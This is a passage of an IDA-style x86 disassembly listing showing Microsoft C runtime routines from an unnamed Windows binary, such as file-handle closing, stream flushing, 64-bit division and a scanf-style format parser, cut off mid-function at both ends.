; sub_4087E0+1C4�j ...
or byte ptr [esi+4], 40h
mov dword ptr [esi], 0FFFFFFFEh
loc_4089EF: ; CODE XREF: sub_4087E0+19B�j
; sub_4087E0+203�j
inc ebx
cmp ebx, 3
jl loc_408960
push dword_433C84
call ds:dword_41D150 ; LockResource
xor eax, eax
jmp short loc_408A1A
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+ms_exc.old_esp]
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
loc_408A17: ; CODE XREF: sub_4087E0+31�j
; sub_4087E0+168�j ...
or eax, 0FFFFFFFFh
loc_408A1A: ; CODE XREF: sub_4087E0+227�j
call __SEH_epilog4
retn
sub_4087E0 endp
; =============== S U B R O U T I N E =======================================
sub_408A20 proc near ; CODE XREF: sub_403207+63�p
; sub_403207+6F�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
xor esi, esi
cmp eax, esi
jnz short loc_408A48
call sub_4057D3
push esi
push esi
push esi
push esi
push esi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_408A48: ; CODE XREF: sub_408A20+9�j
mov eax, [eax+10h]
pop esi
retn
sub_408A20 endp
; =============== S U B R O U T I N E =======================================
sub_408A4D proc near ; CODE XREF: sub_408AE1+94�p
; sub_40E072+340�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
push esi
call sub_40ED7D
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408AAC
cmp esi, 1
mov eax, dword_433CA0
jnz short loc_408A6F
test byte ptr [eax+54h], 1
jnz short loc_408A7A
loc_408A6F: ; CODE XREF: sub_408A4D+1A�j
cmp esi, 2
jnz short loc_408A90
test byte ptr [eax+2Ch], 1
jz short loc_408A90
loc_408A7A: ; CODE XREF: sub_408A4D+20�j
push 2
call sub_40ED7D
push 1
mov edi, eax
call sub_40ED7D
cmp eax, edi
pop ecx
pop ecx
jz short loc_408AAC
loc_408A90: ; CODE XREF: sub_408A4D+25�j
; sub_408A4D+2B�j
push esi
call sub_40ED7D
pop ecx
push eax
call ds:dword_41D0DC ; CloseHandle
test eax, eax
jnz short loc_408AAC
call ds:dword_41D0F0 ; RtlGetLastWin32Error
mov edi, eax
jmp short loc_408AAE
; ---------------------------------------------------------------------------
loc_408AAC: ; CODE XREF: sub_408A4D+10�j
; sub_408A4D+41�j ...
xor edi, edi
loc_408AAE: ; CODE XREF: sub_408A4D+5D�j
push esi
call sub_40ECFC
mov eax, esi
and esi, 1Fh
imul esi, 28h
sar eax, 5
test edi, edi
mov eax, dword_433CA0[eax*4]
pop ecx
mov byte ptr [eax+esi+4], 0
jz short loc_408ADC
push edi
call sub_4057F9
pop ecx
or eax, 0FFFFFFFFh
jmp short loc_408ADE
; ---------------------------------------------------------------------------
loc_408ADC: ; CODE XREF: sub_408A4D+81�j
xor eax, eax
loc_408ADE: ; CODE XREF: sub_408A4D+8D�j
pop edi
pop esi
retn
sub_408A4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408AE1 proc near ; CODE XREF: sub_403451+48�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset dword_421578
call __SEH_prolog4
mov eax, [ebp+arg_0]
cmp eax, 0FFFFFFFEh
jnz short loc_408B10
call sub_4057E6
and dword ptr [eax], 0
call sub_4057D3
mov dword ptr [eax], 9
loc_408B08: ; CODE XREF: sub_408AE1+5C�j
or eax, 0FFFFFFFFh
jmp loc_408B9E
; ---------------------------------------------------------------------------
loc_408B10: ; CODE XREF: sub_408AE1+12�j
xor edi, edi
cmp eax, edi
jl short loc_408B1E
cmp eax, dword_433C84
jb short loc_408B3F
loc_408B1E: ; CODE XREF: sub_408AE1+33�j
; sub_408AE1+7C�j
call sub_4057E6
mov [eax], edi
call sub_4057D3
mov dword ptr [eax], 9
push edi
push edi
push edi
push edi
push edi
call sub_402F39
add esp, 14h
jmp short loc_408B08
; ---------------------------------------------------------------------------
loc_408B3F: ; CODE XREF: sub_408AE1+3B�j
mov ecx, eax
sar ecx, 5
lea ebx, ds:433CA0h[ecx*4]
mov esi, eax
and esi, 1Fh
imul esi, 28h
mov ecx, [ebx]
movzx ecx, byte ptr [ecx+esi+4]
and ecx, 1
jz short loc_408B1E
push eax
call sub_40EDEE
pop ecx
mov [ebp+ms_exc.disabled], edi
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_408B80
push [ebp+arg_0]
call sub_408A4D
pop ecx
mov [ebp+var_1C], eax
jmp short loc_408B8F
; ---------------------------------------------------------------------------
loc_408B80: ; CODE XREF: sub_408AE1+8F�j
call sub_4057D3
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_408B8F: ; CODE XREF: sub_408AE1+9D�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_408BA4
mov eax, [ebp+var_1C]
loc_408B9E: ; CODE XREF: sub_408AE1+2A�j
call __SEH_epilog4
retn
sub_408AE1 endp
; =============== S U B R O U T I N E =======================================
sub_408BA4 proc near ; CODE XREF: sub_408AE1+B5�p
; DATA XREF: .rdata:00421590�o
push dword ptr [ebp+8]
call sub_40EE8E
pop ecx
retn
sub_408BA4 endp
; =============== S U B R O U T I N E =======================================
sub_408BAE proc near ; CODE XREF: sub_403451+3C�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_408BD8
test al, 8
jz short loc_408BD8
push dword ptr [esi+8]
call sub_403603
and dword ptr [esi+0Ch], 0FFFFFBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_408BD8: ; CODE XREF: sub_408BAE+A�j
; sub_408BAE+E�j
pop esi
retn
sub_408BAE endp
; =============== S U B R O U T I N E =======================================
sub_408BDA proc near ; CODE XREF: sub_403451+34�p
; sub_4087B1+15�p ...
arg_0 = dword ptr 4
push ebx
push esi
mov esi, [esp+8+arg_0]
mov eax, [esi+0Ch]
mov ecx, eax
and cl, 3
xor ebx, ebx
cmp cl, 2
jnz short loc_408C2E
test ax, 108h
jz short loc_408C2E
mov eax, [esi+8]
push edi
mov edi, [esi]
sub edi, eax
test edi, edi
jle short loc_408C2D
push edi
push eax
push esi
call sub_408A20
pop ecx
push eax
call sub_40D420
add esp, 0Ch
cmp eax, edi
jnz short loc_408C26
mov eax, [esi+0Ch]
test al, al
jns short loc_408C2D
and eax, 0FFFFFFFDh
mov [esi+0Ch], eax
jmp short loc_408C2D
; ---------------------------------------------------------------------------
loc_408C26: ; CODE XREF: sub_408BDA+3B�j
or dword ptr [esi+0Ch], 20h
or ebx, 0FFFFFFFFh
loc_408C2D: ; CODE XREF: sub_408BDA+25�j
; sub_408BDA+42�j ...
pop edi
loc_408C2E: ; CODE XREF: sub_408BDA+13�j
; sub_408BDA+19�j
mov eax, [esi+8]
and dword ptr [esi+4], 0
mov [esi], eax
pop esi
mov eax, ebx
pop ebx
retn
sub_408BDA endp
; =============== S U B R O U T I N E =======================================
sub_408C3C proc near ; CODE XREF: sub_408C7E+69�p
; sub_408C7E+84�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jnz short loc_408C4E
push esi
call sub_408C7E
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_408C4E: ; CODE XREF: sub_408C3C+7�j
push esi
call sub_408BDA
test eax, eax
pop ecx
jz short loc_408C5E
or eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_408C5E: ; CODE XREF: sub_408C3C+1B�j
test word ptr [esi+0Ch], 4000h
jz short loc_408C7A
push esi
call sub_408A20
push eax
call sub_40F04F
pop ecx
pop ecx
neg eax
sbb eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_408C7A: ; CODE XREF: sub_408C3C+28�j
xor eax, eax
pop esi
retn
sub_408C3C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408C7E proc near ; CODE XREF: sub_408C3C+A�p
; sub_408D58+2�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00408D31 SIZE 0000001E BYTES
push 14h
push offset dword_421598
call __SEH_prolog4
xor edi, edi
mov [ebp+var_1C], edi
mov [ebp+var_24], edi
push 1
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], edi
xor esi, esi
loc_408C9F: ; CODE XREF: sub_408C7E+9B�j
mov [ebp+var_20], esi
cmp esi, dword_434DC0
jge loc_408D31
mov eax, dword_433DA0
lea eax, [eax+esi*4]
cmp [eax], edi
jz short loc_408D18
mov eax, [eax]
test byte ptr [eax+0Ch], 83h
jz short loc_408D18
push eax
push esi
call sub_40818A
pop ecx
pop ecx
xor edx, edx
inc edx
mov [ebp+ms_exc.disabled], edx
mov eax, dword_433DA0
mov eax, [eax+esi*4]
mov ecx, [eax+0Ch]
test cl, 83h
jz short loc_408D10
cmp [ebp+arg_0], edx
jnz short loc_408CF7
push eax
call sub_408C3C
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_408D10
inc [ebp+var_1C]
jmp short loc_408D10
; ---------------------------------------------------------------------------
loc_408CF7: ; CODE XREF: sub_408C7E+66�j
cmp [ebp+arg_0], edi
jnz short loc_408D10
test cl, 2
jz short loc_408D10
push eax
call sub_408C3C
pop ecx
cmp eax, 0FFFFFFFFh
jnz short loc_408D10
or [ebp+var_24], eax
loc_408D10: ; CODE XREF: sub_408C7E+61�j
; sub_408C7E+72�j ...
mov [ebp+ms_exc.disabled], edi
call sub_408D20
loc_408D18: ; CODE XREF: sub_408C7E+3A�j
; sub_408C7E+42�j
inc esi
jmp short loc_408C9F
sub_408C7E endp
; =============== S U B R O U T I N E =======================================
sub_408D1B proc near ; DATA XREF: .rdata:004215BC�o
xor edi, edi
mov esi, [ebp-20h]
sub_408D1B endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_408D20 proc near ; CODE XREF: sub_408C7E+95�p
mov eax, dword_433DA0
push dword ptr [eax+esi*4]
push esi
call sub_4081DC
pop ecx
pop ecx
retn
sub_408D20 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_408C7E
loc_408D31: ; CODE XREF: sub_408C7E+2A�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_408D4F
cmp [ebp+arg_0], 1
mov eax, [ebp+var_1C]
jz short loc_408D49
mov eax, [ebp+var_24]
loc_408D49: ; CODE XREF: sub_408C7E+C6�j
call __SEH_epilog4
retn
; END OF FUNCTION CHUNK FOR sub_408C7E
; =============== S U B R O U T I N E =======================================
sub_408D4F proc near ; CODE XREF: sub_408C7E+BA�p
; DATA XREF: .rdata:004215B0�o
push 1
call sub_40591F
pop ecx
retn
sub_408D4F endp
; =============== S U B R O U T I N E =======================================
sub_408D58 proc near ; CODE XREF: sub_40813B�p
push 1
call sub_408C7E
pop ecx
retn
sub_408D58 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_408D70 proc near ; CODE XREF: sub_403540+29�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
mov eax, [esp+8+arg_C]
or eax, eax
jnz short loc_408D92
mov ecx, [esp+8+arg_8]
mov eax, [esp+8+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+8+arg_0]
div ecx
mov edx, ebx
jmp short loc_408DD3
; ---------------------------------------------------------------------------
loc_408D92: ; CODE XREF: sub_408D70+8�j
mov ecx, eax
mov ebx, [esp+8+arg_8]
mov edx, [esp+8+arg_4]
mov eax, [esp+8+arg_0]
loc_408DA0: ; CODE XREF: sub_408D70+3A�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_408DA0
div ebx
mov esi, eax
mul [esp+8+arg_C]
mov ecx, eax
mov eax, [esp+8+arg_8]
mul esi
add edx, ecx
jb short loc_408DCE
cmp edx, [esp+8+arg_4]
ja short loc_408DCE
jb short loc_408DCF
cmp eax, [esp+8+arg_0]
jbe short loc_408DCF
loc_408DCE: ; CODE XREF: sub_408D70+4E�j
; sub_408D70+54�j
dec esi
loc_408DCF: ; CODE XREF: sub_408D70+56�j
; sub_408D70+5C�j
xor edx, edx
mov eax, esi
loc_408DD3: ; CODE XREF: sub_408D70+20�j
pop esi
pop ebx
retn 10h
sub_408D70 endp
; =============== S U B R O U T I N E =======================================
sub_408DD8 proc near ; CODE XREF: sub_408E67+3CD�p
; sub_408E67+447�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esi]
cmp [esp+arg_0], eax
jnz short loc_408E28
mov ecx, [edi]
cmp ecx, [esp+arg_4]
push 2
push eax
jnz short loc_408E17
call sub_40777A
test eax, eax
pop ecx
pop ecx
mov [edi], eax
jnz short loc_408DFB
loc_408DF8: ; CODE XREF: sub_408DD8+4A�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_408DFB: ; CODE XREF: sub_408DD8+1E�j
mov eax, [esp+arg_8]
mov dword ptr [eax], 1
push dword ptr [esi]
push [esp+4+arg_4]
push dword ptr [edi]
call sub_407BF0
add esp, 0Ch
jmp short loc_408E26
; ---------------------------------------------------------------------------
loc_408E17: ; CODE XREF: sub_408DD8+11�j
push ecx
call sub_40780D
add esp, 0Ch
test eax, eax
jz short loc_408DF8
mov [edi], eax
loc_408E26: ; CODE XREF: sub_408DD8+3D�j
shl dword ptr [esi], 1
loc_408E28: ; CODE XREF: sub_408DD8+6�j
xor eax, eax
inc eax
retn
sub_408DD8 endp
; =============== S U B R O U T I N E =======================================
sub_408E2C proc near ; CODE XREF: sub_408E42+7�p
; sub_408E67+2E1�p ...
dec dword ptr [edx+4]
js short loc_408E3A
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_408E3A: ; CODE XREF: sub_408E2C+3�j
push edx
call sub_409C8D
pop ecx
retn
sub_408E2C endp
; =============== S U B R O U T I N E =======================================
sub_408E42 proc near ; CODE XREF: sub_408E67+14F�p
; sub_408E67+2D3�p
arg_0 = dword ptr 4
push ebx
loc_408E43: ; CODE XREF: sub_408E42+1F�j
mov edx, [esp+4+arg_0]
inc dword ptr [esi]
call sub_408E2C
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_408E63
movzx eax, bl
push eax
call sub_40F276
test eax, eax
pop ecx
jnz short loc_408E43
loc_408E63: ; CODE XREF: sub_408E42+11�j
mov eax, ebx
pop ebx
retn
sub_408E42 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=18Ch
sub_408E67 proc near ; DATA XREF: sub_4035E4+10�o
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1F0 = dword ptr -1F0h
var_1EC = byte ptr -1ECh
var_1E8 = dword ptr -1E8h
var_1E4 = dword ptr -1E4h
var_1E0 = dword ptr -1E0h
var_1DC = byte ptr -1DCh
var_1DB = byte ptr -1DBh
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C9 = byte ptr -1C9h
var_1C8 = dword ptr -1C8h
var_1C4 = dword ptr -1C4h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A4 = byte ptr -1A4h
var_1A3 = byte ptr -1A3h
var_1A2 = byte ptr -1A2h
var_1A1 = byte ptr -1A1h
var_1A0 = dword ptr -1A0h
var_19A = byte ptr -19Ah
var_199 = byte ptr -199h
var_198 = dword ptr -198h
var_191 = byte ptr -191h
var_190 = dword ptr -190h
var_189 = byte ptr -189h
var_188 = dword ptr -188h
var_184 = byte ptr -184h
var_24 = byte ptr -24h
var_19 = byte ptr -19h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
lea ebp, [esp-18Ch]
sub esp, 1FCh
mov eax, dword_423064
xor eax, ebp
mov [ebp+18Ch+var_4], eax
mov eax, [ebp+18Ch+arg_C]
push ebx
push esi
mov esi, [ebp+18Ch+arg_0]
xor ebx, ebx
push edi
mov edi, [ebp+18Ch+arg_4]
cmp edi, ebx
mov [ebp+18Ch+var_1E4], eax
lea eax, [ebp+18Ch+var_184]
mov [ebp+18Ch+var_1A0], esi
mov [ebp+18Ch+var_1B4], edi
mov [ebp+18Ch+var_1B0], eax
mov [ebp+18Ch+var_1D8], 15Eh
mov [ebp+18Ch+var_1D0], ebx
mov [ebp+18Ch+var_1E8], ebx
mov [ebp+18Ch+var_190], ebx
jnz short loc_408EDC
loc_408EBC: ; CODE XREF: sub_408E67+77�j
; sub_408E67+C6�j ...
call sub_4057D3
push ebx
push ebx
push ebx
push ebx
push ebx
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
or eax, 0FFFFFFFFh
jmp loc_409A9C
; ---------------------------------------------------------------------------
loc_408EDC: ; CODE XREF: sub_408E67+53�j
cmp esi, ebx
jz short loc_408EBC
test byte ptr [esi+0Ch], 40h
jnz loc_408F7B
push esi
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408F24
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_408F24
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_408F29
; ---------------------------------------------------------------------------
loc_408F24: ; CODE XREF: sub_408E67+8D�j
; sub_408E67+99�j
mov eax, offset dword_423BD0
loc_408F29: ; CODE XREF: sub_408E67+BB�j
test byte ptr [eax+24h], 7Fh
jnz short loc_408EBC
push esi
call sub_408A20
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408F69
push esi
call sub_408A20
cmp eax, 0FFFFFFFEh
pop ecx
jz short loc_408F69
push esi
call sub_408A20
sar eax, 5
push esi
lea edi, ds:433CA0h[eax*4]
call sub_408A20
and eax, 1Fh
imul eax, 28h
add eax, [edi]
pop ecx
pop ecx
jmp short loc_408F6E
; ---------------------------------------------------------------------------
loc_408F69: ; CODE XREF: sub_408E67+D2�j
; sub_408E67+DE�j
mov eax, offset dword_423BD0
loc_408F6E: ; CODE XREF: sub_408E67+100�j
test byte ptr [eax+24h], 80h
jnz loc_408EBC
mov edi, [ebp+18Ch+var_1B4]
loc_408F7B: ; CODE XREF: sub_408E67+7D�j
push [ebp+18Ch+arg_8]
lea ecx, [ebp+18Ch+var_1F8]
call sub_40271F
mov al, [edi]
test al, al
mov [ebp+18Ch+var_1A1], bl
mov [ebp+18Ch+var_188], ebx
mov [ebp+18Ch+var_1C8], ebx
jz loc_409A8C
mov edi, [ebp+18Ch+var_1B4]
loc_408F9F: ; CODE XREF: sub_408E67+BC2�j
movzx eax, al
push eax
call sub_40F276
test eax, eax
pop ecx
jz short loc_408FE0
push [ebp+18Ch+var_1A0]
dec [ebp+18Ch+var_188]
lea esi, [ebp+18Ch+var_188]
call sub_408E42
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_408FCC
push [ebp+18Ch+var_1A0]
push eax
call sub_40F29F
pop ecx
pop ecx
loc_408FCC: ; CODE XREF: sub_408E67+158�j
; sub_408E67+172�j
inc edi
movzx eax, byte ptr [edi]
push eax
call sub_40F276
test eax, eax
pop ecx
jnz short loc_408FCC
jmp loc_409A25
; ---------------------------------------------------------------------------
loc_408FE0: ; CODE XREF: sub_408E67+144�j
cmp byte ptr [edi], 25h
jnz loc_4099CD
xor eax, eax
mov [ebp+18Ch+var_1E0], eax
mov [ebp+18Ch+var_1C9], al
mov [ebp+18Ch+var_1A8], eax
mov [ebp+18Ch+var_1B8], eax
mov [ebp+18Ch+var_198], eax
mov [ebp+18Ch+var_1A4], al
mov [ebp+18Ch+var_1A3], al
mov [ebp+18Ch+var_199], al
mov [ebp+18Ch+var_189], al
mov [ebp+18Ch+var_1A2], al
mov [ebp+18Ch+var_191], al
mov [ebp+18Ch+var_19A], 1
mov [ebp+18Ch+var_1D4], eax
xor esi, esi
loc_409015: ; CODE XREF: sub_408E67+279�j
inc edi
movzx ebx, byte ptr [edi]
movzx eax, bl
push eax
call sub_40F17F
test eax, eax
pop ecx
jz short loc_40903C
mov eax, [ebp+18Ch+var_198]
inc [ebp+18Ch+var_1B8]
imul eax, 0Ah
lea eax, [eax+ebx-30h]
mov [ebp+18Ch+var_198], eax
jmp loc_4090DC
; ---------------------------------------------------------------------------
loc_40903C: ; CODE XREF: sub_408E67+1BE�j
cmp ebx, 4Eh
jg short loc_4090B2
jz loc_4090DC
cmp ebx, 2Ah
jz short loc_4090AD
cmp ebx, 46h
jz loc_4090DC
cmp ebx, 49h
jz short loc_409064
cmp ebx, 4Ch
jnz short loc_4090C1
inc [ebp+18Ch+var_19A]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_409064: ; CODE XREF: sub_408E67+1F1�j
mov cl, [edi+1]
cmp cl, 36h
jnz short loc_409081
lea eax, [edi+2]
cmp byte ptr [eax], 34h
jnz short loc_409081
loc_409074: ; CODE XREF: sub_408E67+265�j
inc [ebp+18Ch+var_1D4]
mov edi, eax
mov [ebp+18Ch+var_1C0], esi
mov [ebp+18Ch+var_1BC], esi
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_409081: ; CODE XREF: sub_408E67+203�j
; sub_408E67+20B�j
cmp cl, 33h
jnz short loc_409092
lea eax, [edi+2]
cmp byte ptr [eax], 32h
jnz short loc_409092
mov edi, eax
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_409092: ; CODE XREF: sub_408E67+21D�j
; sub_408E67+225�j
cmp cl, 64h
jz short loc_4090DC
cmp cl, 69h
jz short loc_4090DC
cmp cl, 6Fh
jz short loc_4090DC
cmp cl, 78h
jz short loc_4090DC
cmp cl, 58h
jnz short loc_4090C1
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090AD: ; CODE XREF: sub_408E67+1E3�j
inc [ebp+18Ch+var_199]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090B2: ; CODE XREF: sub_408E67+1D8�j
cmp ebx, 68h
jz short loc_4090D6
cmp ebx, 6Ch
jz short loc_4090C6
cmp ebx, 77h
jz short loc_4090D1
loc_4090C1: ; CODE XREF: sub_408E67+1F6�j
; sub_408E67+242�j
inc [ebp+18Ch+var_189]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090C6: ; CODE XREF: sub_408E67+253�j
lea eax, [edi+1]
cmp byte ptr [eax], 6Ch
jz short loc_409074
inc [ebp+18Ch+var_19A]
loc_4090D1: ; CODE XREF: sub_408E67+258�j
inc [ebp+18Ch+var_191]
jmp short loc_4090DC
; ---------------------------------------------------------------------------
loc_4090D6: ; CODE XREF: sub_408E67+24E�j
dec [ebp+18Ch+var_19A]
dec [ebp+18Ch+var_191]
loc_4090DC: ; CODE XREF: sub_408E67+1D0�j
; sub_408E67+1DA�j ...
cmp [ebp+18Ch+var_189], 0
jz loc_409015
cmp [ebp+18Ch+var_199], 0
mov [ebp+18Ch+var_1B4], edi
jnz short loc_4090FD
mov eax, [ebp+18Ch+var_1E4]
mov esi, [eax]
mov [ebp+18Ch+var_1FC], eax
add eax, 4
mov [ebp+18Ch+var_1E4], eax
loc_4090FD: ; CODE XREF: sub_408E67+286�j
cmp [ebp+18Ch+var_191], 0
mov [ebp+18Ch+var_1C4], esi
mov [ebp+18Ch+var_189], 0
jnz short loc_40911C
mov al, [edi]
cmp al, 53h
jz short loc_409118
cmp al, 43h
mov [ebp+18Ch+var_191], 0FFh
jnz short loc_40911C
loc_409118: ; CODE XREF: sub_408E67+2A7�j
mov [ebp+18Ch+var_191], 1
loc_40911C: ; CODE XREF: sub_408E67+2A1�j
; sub_408E67+2AF�j
movzx ebx, byte ptr [edi]
or ebx, 20h
cmp ebx, 6Eh
mov [ebp+18Ch+var_1AC], ebx
jz short loc_40915F
cmp ebx, 63h
jz short loc_409142
cmp ebx, 7Bh
jz short loc_409142
push [ebp+18Ch+var_1A0]
lea esi, [ebp+18Ch+var_188]
call sub_408E42
pop ecx
jmp short loc_40914D
; ---------------------------------------------------------------------------
loc_409142: ; CODE XREF: sub_408E67+2C6�j
; sub_408E67+2CB�j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
loc_40914D: ; CODE XREF: sub_408E67+2D9�j
cmp eax, 0FFFFFFFFh
mov [ebp+18Ch+var_190], eax
jz loc_409A59
mov esi, [ebp+18Ch+var_1C4]
mov edi, [ebp+18Ch+var_1B4]
loc_40915F: ; CODE XREF: sub_408E67+2C1�j
mov ecx, [ebp+18Ch+var_1B8]
test ecx, ecx
jz short loc_409170
cmp [ebp+18Ch+var_198], 0
jz loc_409A31
loc_409170: ; CODE XREF: sub_408E67+2FD�j
cmp ebx, 6Fh
jg loc_40957C
jz loc_4097A7
cmp ebx, 63h
jz loc_40946E
push 64h
pop eax
cmp ebx, eax
jz loc_4097A7
jle loc_4095A6
cmp ebx, 67h
jle short loc_4091D6
cmp ebx, 69h
jz short loc_4091BE
cmp ebx, 6Eh
jnz loc_4095A6
cmp [ebp+18Ch+var_199], 0
mov edi, [ebp+18Ch+var_188]
jz loc_4099A1
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_4091BE: ; CODE XREF: sub_408E67+33A�j
mov [ebp+18Ch+var_1AC], eax
loc_4091C1: ; CODE XREF: sub_408E67+734�j
mov ebx, [ebp+18Ch+var_190]
cmp ebx, 2Dh
jnz loc_40968F
mov [ebp+18Ch+var_1A3], 1
jmp loc_409694
; ---------------------------------------------------------------------------
loc_4091D6: ; CODE XREF: sub_408E67+335�j
xor ebx, ebx
cmp [ebp+18Ch+var_190], 2Dh
jnz short loc_4091E7
mov eax, [ebp+18Ch+var_1B0]
mov byte ptr [eax], 2Dh
inc ebx
jmp short loc_4091ED
; ---------------------------------------------------------------------------
loc_4091E7: ; CODE XREF: sub_408E67+375�j
cmp [ebp+18Ch+var_190], 2Bh
jnz short loc_4091FE
loc_4091ED: ; CODE XREF: sub_408E67+37E�j
dec [ebp+18Ch+var_198]
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov [ebp+18Ch+var_190], eax
loc_4091FE: ; CODE XREF: sub_408E67+384�j
cmp [ebp+18Ch+var_1B8], 0
jnz short loc_409208
or [ebp+18Ch+var_198], 0FFFFFFFFh
loc_409208: ; CODE XREF: sub_408E67+39B�j
movzx eax, byte ptr [ebp+18Ch+var_190]
jmp short loc_409255
; ---------------------------------------------------------------------------
loc_40920E: ; CODE XREF: sub_408E67+3F7�j
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jz short loc_409260
mov al, byte ptr [ebp+18Ch+var_190]
mov ecx, [ebp+18Ch+var_1B0]
inc [ebp+18Ch+var_1A8]
mov [ebx+ecx], al
lea eax, [ebp+18Ch+var_1D0]
push eax
lea eax, [ebp+18Ch+var_184]
push eax
inc ebx
push ebx
lea edi, [ebp+18Ch+var_1B0]
lea esi, [ebp+18Ch+var_1D8]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov [ebp+18Ch+var_190], eax
movzx eax, al
loc_409255: ; CODE XREF: sub_408E67+3A5�j
push eax
call sub_40F17F
test eax, eax
pop ecx
jnz short loc_40920E
loc_409260: ; CODE XREF: sub_408E67+3AF�j
mov eax, [ebp+18Ch+var_1F8]
mov eax, [eax+0BCh]
mov eax, [eax]
mov al, [eax]
cmp al, byte ptr [ebp+18Ch+var_190]
mov [ebp+18Ch+var_1A4], al
jnz loc_409316
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jz loc_409316
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov ecx, [ebp+18Ch+var_1B0]
mov [ebp+18Ch+var_190], eax
mov al, [ebp+18Ch+var_1A4]
mov [ebx+ecx], al
lea eax, [ebp+18Ch+var_1D0]
push eax
lea eax, [ebp+18Ch+var_184]
push eax
inc ebx
push ebx
lea edi, [ebp+18Ch+var_1B0]
lea esi, [ebp+18Ch+var_1D8]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
movzx eax, byte ptr [ebp+18Ch+var_190]
jmp short loc_40930B
; ---------------------------------------------------------------------------
loc_4092C4: ; CODE XREF: sub_408E67+4AD�j
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jz short loc_409316
mov eax, [ebp+18Ch+var_1B0]
mov cl, byte ptr [ebp+18Ch+var_190]
inc [ebp+18Ch+var_1A8]
mov [ebx+eax], cl
lea eax, [ebp+18Ch+var_1D0]
push eax
lea eax, [ebp+18Ch+var_184]
push eax
inc ebx
push ebx
lea edi, [ebp+18Ch+var_1B0]
lea esi, [ebp+18Ch+var_1D8]
call sub_408DD8
add esp, 0Ch
test eax, eax
